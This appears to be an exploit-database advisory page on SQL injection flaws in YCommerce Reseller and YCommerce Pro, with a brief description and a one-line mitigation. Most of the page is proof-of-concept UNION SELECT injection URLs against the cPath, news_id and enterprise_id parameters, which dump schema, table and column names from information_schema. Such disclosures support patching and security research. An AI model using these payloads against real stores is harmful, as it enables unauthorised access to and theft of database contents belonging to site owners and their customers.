YCommerce SQL Injection Vulnerabilities

vendor:

YCommerce Reseller and YCommerce Pro

by:

SecurityFocus

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: YCommerce Reseller and YCommerce Pro

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2013

YCommerce SQL Injection Vulnerabilities

YCommerce is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Mitigation:

Input validation should be used to detect and block malicious SQL code.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/55653/info

YCommerce is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 

Proof of Concept - YCommerce Reseller
-------------------------------------
GET Param "cPath" - [Number of columns may vary]
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--

GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--


Proof of Concept - YCommerce Pro
--------------------------------
GET Param "enterprise_id" - [Number of columns may vary]
/store/default.php?enterprise_id=-1 union all select 1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61

GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--